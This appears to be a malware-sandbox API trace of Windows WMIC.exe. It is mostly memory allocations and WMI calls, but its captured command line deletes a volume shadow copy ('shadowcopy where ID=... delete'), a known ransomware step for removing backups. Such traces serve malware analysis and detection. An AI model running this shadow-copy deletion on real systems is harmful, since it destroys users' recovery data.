[0105.470] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0105.470] SysStringLen (param_1="TABLE") returned 0x5 [0105.470] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0105.470] SysStringLen (param_1="XML") returned 0x3 [0105.470] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0105.470] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.470] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0105.470] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.470] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.470] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0105.470] malloc (_Size=0x30) returned 0x608380 [0105.470] malloc (_Size=0x18) returned 0x60c860 [0105.470] free (_Block=0x60c860) [0105.470] malloc (_Size=0x18) returned 0x60c860 [0105.470] malloc (_Size=0x18) returned 0x60c880 [0105.471] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.471] SysStringLen (param_1="TABLE") returned 0x5 [0105.471] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.471] SysStringLen (param_1="XML") returned 0x3 [0105.471] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.471] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.471] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.471] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.471] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.471] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.471] malloc (_Size=0x30) returned 0x6083c0 [0105.471] malloc (_Size=0x18) returned 0x60c8a0 [0105.471] free (_Block=0x60c8a0) [0105.471] malloc (_Size=0x18) returned 0x60c8a0 [0105.471] malloc (_Size=0x18) returned 0x60c8c0 [0105.471] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0105.471] SysStringLen (param_1="TABLE") returned 0x5 [0105.471] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0105.471] SysStringLen (param_1="XML") returned 0x3 [0105.471] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0105.471] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.471] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0105.471] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.471] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0105.472] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.472] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.472] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0105.472] malloc (_Size=0x30) returned 0x608400 [0105.472] malloc (_Size=0x18) returned 0x60c8e0 [0105.472] free (_Block=0x60c8e0) [0105.472] malloc (_Size=0x18) returned 0x60c8e0 [0105.472] malloc (_Size=0x18) returned 0x60c900 [0105.472] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0105.472] SysStringLen (param_1="TABLE") returned 0x5 [0105.472] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0105.472] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.472] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0105.472] SysStringLen (param_1="XML") returned 0x3 [0105.472] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0105.472] SysStringLen (param_1="texttablewsys") returned 0xd [0105.472] SysStringLen (param_1="XML") returned 0x3 [0105.472] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0105.472] malloc (_Size=0x30) returned 0x608440 [0105.473] malloc (_Size=0x18) returned 0x60c920 [0105.473] free (_Block=0x60c920) [0105.473] malloc (_Size=0x18) returned 0x60c920 [0105.473] malloc (_Size=0x18) returned 0x60c940 [0105.473] SysStringLen (param_1="htable-sortby") returned 0xd [0105.473] SysStringLen (param_1="TABLE") returned 0x5 [0105.473] SysStringLen (param_1="htable-sortby") returned 0xd [0105.473] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.473] SysStringLen (param_1="htable-sortby") returned 0xd [0105.473] SysStringLen (param_1="XML") returned 0x3 [0105.473] SysStringLen (param_1="htable-sortby") returned 0xd [0105.473] SysStringLen (param_1="texttablewsys") returned 0xd [0105.473] SysStringLen (param_1="htable-sortby") returned 0xd [0105.473] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0105.473] SysStringLen (param_1="XML") returned 0x3 [0105.473] SysStringLen (param_1="htable-sortby") returned 0xd [0105.473] malloc (_Size=0x30) returned 0x608480 [0105.473] malloc (_Size=0x18) returned 0x60c960 [0105.474] free (_Block=0x60c960) [0105.474] malloc (_Size=0x18) returned 0x60c960 [0105.474] malloc (_Size=0x18) returned 0x60c980 [0105.474] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0105.474] SysStringLen (param_1="TABLE") returned 0x5 [0105.474] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0105.474] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.474] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0105.474] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.474] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0105.474] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0105.474] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.474] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0105.474] malloc (_Size=0x30) returned 0x6084c0 [0105.474] malloc (_Size=0x18) returned 0x60c9a0 [0105.474] free (_Block=0x60c9a0) [0105.474] malloc (_Size=0x18) returned 0x60c9a0 [0105.474] malloc (_Size=0x18) returned 0x60c9c0 [0105.474] SysStringLen (param_1="wmiclimofformat") returned 0xf [0105.474] SysStringLen (param_1="TABLE") returned 0x5 [0105.474] SysStringLen (param_1="wmiclimofformat") returned 0xf [0105.475] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.475] SysStringLen (param_1="wmiclimofformat") returned 0xf [0105.475] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.475] SysStringLen (param_1="wmiclimofformat") returned 0xf [0105.475] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0105.475] SysStringLen (param_1="wmiclimofformat") returned 0xf [0105.475] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0105.475] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.475] SysStringLen (param_1="wmiclimofformat") returned 0xf [0105.475] malloc (_Size=0x30) returned 0x608500 [0105.475] malloc (_Size=0x18) returned 0x60c9e0 [0105.475] free (_Block=0x60c9e0) [0105.475] malloc (_Size=0x18) returned 0x60c9e0 [0105.475] malloc (_Size=0x18) returned 0x60ca00 [0105.475] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0105.475] SysStringLen (param_1="TABLE") returned 0x5 [0105.475] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0105.475] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.475] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0105.475] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.475] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0105.475] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.475] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.475] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0105.475] malloc (_Size=0x30) returned 0x608540 [0105.476] malloc (_Size=0x18) returned 0x60ca20 [0105.476] free (_Block=0x60ca20) [0105.476] malloc (_Size=0x18) returned 0x60ca20 [0105.476] malloc (_Size=0x18) returned 0x60ca40 [0105.476] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0105.476] SysStringLen (param_1="TABLE") returned 0x5 [0105.476] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0105.476] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.476] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0105.476] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.476] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0105.476] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.476] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0105.476] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0105.476] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.476] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0105.476] malloc (_Size=0x30) returned 0x608580 [0105.476] FreeThreadedDOMDocument:IUnknown:Release (This=0x21b71d0) returned 0x0 [0105.477] free (_Block=0x606e90) [0105.477] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete" [0105.477] malloc (_Size=0xe0) returned 0x60cd30 [0105.477] memcpy_s (in: _Destination=0x60cd30, _DestinationSize=0xde, _Source=0x3425be, _SourceSize=0xd0 | out: _Destination=0x60cd30) returned 0x0 [0105.477] malloc (_Size=0x18) returned 0x60ca60 [0105.477] malloc (_Size=0x18) returned 0x60ca80 [0105.477] malloc (_Size=0x18) returned 0x60caa0 [0105.477] malloc (_Size=0x18) returned 0x60cac0 [0105.477] malloc (_Size=0x80) returned 0x606e90 [0105.477] GetLocalTime (in: lpSystemTime=0x1cf870 | out: lpSystemTime=0x1cf870*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, wSecond=0xa, wMilliseconds=0x11)) [0105.477] _vsnwprintf (in: _Buffer=0x606e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x1cf7c8 | out: _Buffer="09-04-2020T08:55:10") returned 19 [0105.477] lstrlenW (lpString=" shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete") returned 71 [0105.477] malloc (_Size=0x90) returned 0x6070a0 [0105.477] lstrlenW (lpString=" shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete") returned 71 [0105.477] lstrlenW (lpString=" shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete") returned 71 [0105.477] malloc (_Size=0x90) returned 0x60ce20 [0105.477] lstrlenW (lpString=" shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete") returned 71 [0105.477] lstrlenW (lpString=" shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete") returned 71 [0105.477] lstrlenW (lpString=" shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete") returned 71 [0105.477] malloc (_Size=0x16) returned 0x60cae0 [0105.477] lstrlenW (lpString="shadowcopy") returned 10 [0105.477] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0105.478] malloc (_Size=0x16) returned 0x60cb00 [0105.478] malloc (_Size=0x8) returned 0x607140 [0105.478] free (_Block=0x0) [0105.478] free (_Block=0x60cae0) [0105.478] lstrlenW (lpString=" shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete") returned 71 [0105.478] malloc (_Size=0xc) returned 0x60cae0 [0105.478] lstrlenW (lpString="where") returned 5 [0105.478] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0105.478] malloc (_Size=0xc) returned 0x60cb20 [0105.478] malloc (_Size=0x10) returned 0x60cb40 [0105.478] memmove_s (in: _Destination=0x60cb40, _DestinationSize=0x8, _Source=0x607140, _SourceSize=0x8 | out: _Destination=0x60cb40) returned 0x0 [0105.478] free (_Block=0x607140) [0105.478] free (_Block=0x0) [0105.478] free (_Block=0x60cae0) [0105.478] lstrlenW (lpString=" shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete") returned 71 [0105.478] malloc (_Size=0x5c) returned 0x60cec0 [0105.478] lstrlenW (lpString="\"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\"") returned 45 [0105.478] _wcsicmp (_String1="\"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\"", _String2="\"NULL\"") returned -5 [0105.478] lstrlenW (lpString="\"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\"") returned 45 [0105.478] lstrlenW (lpString="\"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\"") returned 45 [0105.478] malloc (_Size=0x5c) returned 0x60cf30 [0105.478] malloc (_Size=0x18) returned 0x60cae0 [0105.478] memmove_s (in: _Destination=0x60cae0, _DestinationSize=0x10, _Source=0x60cb40, _SourceSize=0x10 | out: _Destination=0x60cae0) returned 0x0 [0105.478] free (_Block=0x60cb40) [0105.478] free (_Block=0x0) [0105.478] free (_Block=0x60cec0) [0105.478] lstrlenW (lpString=" shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete") returned 71 [0105.478] malloc (_Size=0xe) returned 0x60cb40 [0105.478] lstrlenW (lpString="delete") returned 6 [0105.478] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0105.478] malloc (_Size=0xe) returned 0x60cb60 [0105.478] malloc (_Size=0x20) returned 0x60cec0 [0105.478] memmove_s (in: _Destination=0x60cec0, _DestinationSize=0x18, _Source=0x60cae0, _SourceSize=0x18 | out: _Destination=0x60cec0) returned 0x0 [0105.478] free (_Block=0x60cae0) [0105.478] free (_Block=0x0) [0105.479] free (_Block=0x60cb40) [0105.479] malloc (_Size=0x20) returned 0x60cef0 [0105.479] lstrlenW (lpString="QUIT") returned 4 [0105.479] lstrlenW (lpString="shadowcopy") returned 10 [0105.479] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0105.479] lstrlenW (lpString="EXIT") returned 4 [0105.479] lstrlenW (lpString="shadowcopy") returned 10 [0105.479] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0105.479] free (_Block=0x60cef0) [0105.479] WbemLocator:IUnknown:AddRef (This=0x1c71390) returned 0x2 [0105.479] malloc (_Size=0x20) returned 0x60cef0 [0105.479] lstrlenW (lpString="/") returned 1 [0105.479] lstrlenW (lpString="shadowcopy") returned 10 [0105.479] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0105.479] lstrlenW (lpString="-") returned 1 [0105.479] lstrlenW (lpString="shadowcopy") returned 10 [0105.479] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0105.479] lstrlenW (lpString="CLASS") returned 5 [0105.479] lstrlenW (lpString="shadowcopy") returned 10 [0105.479] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0105.479] lstrlenW (lpString="PATH") returned 4 [0105.479] lstrlenW (lpString="shadowcopy") returned 10 [0105.479] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0105.479] lstrlenW (lpString="CONTEXT") returned 7 [0105.479] lstrlenW (lpString="shadowcopy") returned 10 [0105.479] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0105.479] lstrlenW (lpString="shadowcopy") returned 10 [0105.479] malloc (_Size=0x16) returned 0x60cb40 [0105.479] lstrlenW (lpString="shadowcopy") returned 10 [0105.480] GetCurrentThreadId () returned 0x83c [0105.480] ??0CHString@@QEAA@XZ () returned 0x1cf680 [0105.480] malloc (_Size=0x18) returned 0x60cae0 [0105.480] malloc (_Size=0x18) returned 0x60cb80 [0105.480] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c71390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff462998 | out: ppNamespace=0xff462998*=0x1c83a98) returned 0x0 [0105.496] free (_Block=0x60cb80) [0105.496] free (_Block=0x60cae0) [0105.496] CoSetProxyBlanket (pProxy=0x1c83a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0105.497] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0105.497] GetCurrentThreadId () returned 0x83c [0105.497] ??0CHString@@QEAA@XZ () returned 0x1cf518 [0105.497] malloc (_Size=0x18) returned 0x60cae0 [0105.497] malloc (_Size=0x18) returned 0x60cb80 [0105.497] malloc (_Size=0x18) returned 0x60cba0 [0105.497] malloc (_Size=0x18) returned 0x60cbc0 [0105.497] SysStringLen (param_1="root\\cli") returned 0x8 [0105.497] SysStringLen (param_1="\\") returned 0x1 [0105.497] malloc (_Size=0x18) returned 0x60cbe0 [0105.497] SysStringLen (param_1="root\\cli\\") returned 0x9 [0105.497] SysStringLen (param_1="ms_409") returned 0x6 [0105.497] free (_Block=0x60cbc0) [0105.497] free (_Block=0x60cba0) [0105.497] free (_Block=0x60cb80) [0105.497] free (_Block=0x60cae0) [0105.497] malloc (_Size=0x18) returned 0x60cae0 [0105.497] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c71390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4629a0 | out: ppNamespace=0xff4629a0*=0x1c83b28) returned 0x0 [0105.501] free (_Block=0x60cae0) [0105.501] free (_Block=0x60cbe0) [0105.501] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0105.501] GetCurrentThreadId () returned 0x83c [0105.501] ??0CHString@@QEAA@XZ () returned 0x1cf690 [0105.501] malloc (_Size=0x18) returned 0x60cbe0 [0105.501] malloc (_Size=0x18) returned 0x60cae0 [0105.501] malloc (_Size=0x18) returned 0x60cb80 [0105.501] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0105.501] malloc (_Size=0x3a) returned 0x60cfa0 [0105.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3f1980, cbMultiByte=-1, lpWideCharStr=0x60cfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0105.501] free (_Block=0x60cfa0) [0105.501] malloc (_Size=0x18) returned 0x60cba0 [0105.502] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0105.502] SysStringLen (param_1="shadowcopy") returned 0xa [0105.502] malloc (_Size=0x18) returned 0x60cbc0 [0105.502] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0105.502] SysStringLen (param_1="'") returned 0x1 [0105.502] free (_Block=0x60cba0) [0105.502] free (_Block=0x60cb80) [0105.502] free (_Block=0x60cae0) [0105.502] free (_Block=0x60cbe0) [0105.502] IWbemServices:GetObject (in: This=0x1c83a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x1cf698*=0x0, ppCallResult=0x0 | out: ppObject=0x1cf698*=0x1c904e0, ppCallResult=0x0) returned 0x0 [0105.507] malloc (_Size=0x18) returned 0x60cbe0 [0105.507] IWbemClassObject:Get (in: This=0x1c904e0, wszName="Target", lFlags=0, pVal=0x1cf5c0*(varType=0x0, wReserved1=0xff46, wReserved2=0x0, wReserved3=0x0, varVal1=0xff462998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf5c0*(varType=0x8, wReserved1=0xff46, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.507] free (_Block=0x60cbe0) [0105.507] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0105.507] malloc (_Size=0x3e) returned 0x60cfa0 [0105.507] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0105.507] malloc (_Size=0x18) returned 0x60cbe0 [0105.508] IWbemClassObject:Get (in: This=0x1c904e0, wszName="PWhere", lFlags=0, pVal=0x1cf5c0*(varType=0x0, wReserved1=0xff46, wReserved2=0x0, wReserved3=0x0, varVal1=0x36e298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf5c0*(varType=0x8, wReserved1=0xff46, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.508] free (_Block=0x60cbe0) [0105.508] lstrlenW (lpString=" Where ID = '#'") returned 15 [0105.508] malloc (_Size=0x20) returned 0x60cff0 [0105.508] lstrlenW (lpString=" Where ID = '#'") returned 15 [0105.508] malloc (_Size=0x18) returned 0x60cbe0 [0105.508] IWbemClassObject:Get (in: This=0x1c904e0, wszName="Connection", lFlags=0, pVal=0x1cf5c0*(varType=0x0, wReserved1=0xff46, wReserved2=0x0, wReserved3=0x0, varVal1=0x3bbd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf5c0*(varType=0xd, wReserved1=0xff46, wReserved2=0x0, wReserved3=0x0, varVal1=0x1c909c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.508] free (_Block=0x60cbe0) [0105.508] IUnknown:QueryInterface (in: This=0x1c909c0, riid=0xff3f7360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1cf5b0 | out: ppvObject=0x1cf5b0*=0x1c909c0) returned 0x0 [0105.508] GetCurrentThreadId () returned 0x83c [0105.508] ??0CHString@@QEAA@XZ () returned 0x1cf4d8 [0105.508] malloc (_Size=0x18) returned 0x60cbe0 [0105.508] IWbemClassObject:Get (in: This=0x1c909c0, wszName="Namespace", lFlags=0, pVal=0x1cf500*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff40738f, varVal2=0x60cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf500*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x60cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.508] free (_Block=0x60cbe0) [0105.508] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0105.508] malloc (_Size=0x16) returned 0x60cbe0 [0105.508] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0105.508] malloc (_Size=0x18) returned 0x60cae0 [0105.508] IWbemClassObject:Get (in: This=0x1c909c0, wszName="Locale", lFlags=0, pVal=0x1cf500*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ea648, varVal2=0x60cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf500*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x60cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.508] free (_Block=0x60cae0) [0105.509] lstrlenW (lpString="ms_409") returned 6 [0105.509] malloc (_Size=0xe) returned 0x60cae0 [0105.509] lstrlenW (lpString="ms_409") returned 6 [0105.509] malloc (_Size=0x18) returned 0x60cb80 [0105.509] IWbemClassObject:Get (in: This=0x1c909c0, wszName="User", lFlags=0, pVal=0x1cf500*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ea648, varVal2=0x60cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf500*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ea648, varVal2=0x60cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.509] free (_Block=0x60cb80) [0105.509] malloc (_Size=0x18) returned 0x60cb80 [0105.509] IWbemClassObject:Get (in: This=0x1c909c0, wszName="Password", lFlags=0, pVal=0x1cf500*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ea648, varVal2=0x60cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf500*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ea648, varVal2=0x60cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.509] free (_Block=0x60cb80) [0105.509] malloc (_Size=0x18) returned 0x60cb80 [0105.509] IWbemClassObject:Get (in: This=0x1c909c0, wszName="Server", lFlags=0, pVal=0x1cf500*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ea648, varVal2=0x60cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf500*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x60cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.509] free (_Block=0x60cb80) [0105.509] lstrlenW (lpString=".") returned 1 [0105.509] malloc (_Size=0x4) returned 0x607140 [0105.509] lstrlenW (lpString=".") returned 1 [0105.509] malloc (_Size=0x18) returned 0x60cb80 [0105.509] IWbemClassObject:Get (in: This=0x1c909c0, wszName="Authority", lFlags=0, pVal=0x1cf500*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ea648, varVal2=0x60cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf500*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ea648, varVal2=0x60cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.509] free (_Block=0x60cb80) [0105.509] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0105.509] IUnknown:Release (This=0x1c909c0) returned 0x1 [0105.509] GetCurrentThreadId () returned 0x83c [0105.509] ??0CHString@@QEAA@XZ () returned 0x1cf4d8 [0105.509] malloc (_Size=0x18) returned 0x60cb80 [0105.510] IWbemClassObject:Get (in: This=0x1c904e0, wszName="__RELPATH", lFlags=0, pVal=0x1cf500*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ea648, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf500*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0105.510] free (_Block=0x60cb80) [0105.510] malloc (_Size=0x18) returned 0x60cb80 [0105.510] GetCurrentThreadId () returned 0x83c [0105.510] ??0CHString@@QEAA@XZ () returned 0x1cf358 [0105.510] ??0CHString@@QEAA@PEBG@Z () returned 0x1cf370 [0105.510] ??0CHString@@QEAA@AEBV0@@Z () returned 0x1cf300 [0105.510] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0105.510] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x60d020 [0105.510] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0105.510] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1cf2c0 [0105.510] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1cf308 [0105.510] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf370 [0105.510] ??1CHString@@QEAA@XZ () returned 0x738a501 [0105.510] ??1CHString@@QEAA@XZ () returned 0x738a501 [0105.510] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1cf2c8 [0105.510] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf300 [0105.510] ??1CHString@@QEAA@XZ () returned 0x1 [0105.510] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x60d090 [0105.510] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0105.510] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1cf2c0 [0105.510] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1cf308 [0105.510] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf370 [0105.510] ??1CHString@@QEAA@XZ () returned 0x738a501 [0105.510] ??1CHString@@QEAA@XZ () returned 0x738a501 [0105.510] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1cf2c8 [0105.510] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf300 [0105.510] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0105.510] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0105.511] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0105.511] malloc (_Size=0x18) returned 0x60cba0 [0105.511] malloc (_Size=0x18) returned 0x60cc00 [0105.511] malloc (_Size=0x18) returned 0x60cc20 [0105.511] malloc (_Size=0x18) returned 0x60cc40 [0105.511] malloc (_Size=0x18) returned 0x60cc60 [0105.511] 